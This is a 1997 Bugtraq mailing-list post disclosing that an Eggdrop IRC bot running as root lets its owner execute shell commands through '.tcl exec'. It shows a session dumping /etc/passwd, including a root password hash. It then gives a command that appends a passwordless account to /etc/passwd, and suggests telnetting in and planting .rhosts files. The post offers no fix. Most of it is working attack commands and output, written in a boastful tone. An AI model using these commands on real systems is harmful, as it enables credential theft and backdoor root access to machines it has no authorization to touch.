[5224] in bugtraq
Having fun with eggdrop bot
daemon@ATHENA.MIT.EDU (Giuliano COCAINE)
Fri Aug 29 12:55:12 1997
Date: Thu, 28 Aug 1997 21:47:36 -0700
Reply-To: Giuliano COCAINE <cocaine@ROCKETMAIL.COM>
From: Giuliano COCAINE <cocaine@ROCKETMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
Eggdrops bots can access files all over the system if you're owner and
the bot runs with root permissions.
You can get the passwd when you're the owner of the bot, and also
modify it if the bot is running with the root permissions.
Tested in an Eggdrop bot 1.0p
<DiE4YoU> .tcl exec cat /etc/passwd
[1:21] <lamebot> Tcl: root:zWCF/X7irjQ4E:0:0:root:/:/bin/bash
[1:21] <lamebot> Tcl: bin:*:1:1:bin:/bin:
[1:21] <lamebot> Tcl: daemon:*:2:2:daemon:/sbin:
[1:21] <lamebot> Tcl: adm:*:3:4:adm:/var/adm:
[1:21] <lamebot> Tcl: lp:*:4:7:lp:/var/spool/lpd:
[1:21] <lamebot> Tcl: sync:*:5:0:sync:/sbin:/bin/sync
you can also try
.tcl exec echo "stupid::394:100:/:/bin/bash" >> /etc/passwd
and telet to the host of the bot
you can try to make .rhosts and all shit you may think.
Think 'bout that ;)
Giuliano Mendez
_____________________________________________________________________
Sent by RocketMail. Get your free e-mail at http://www.rocketmail.com
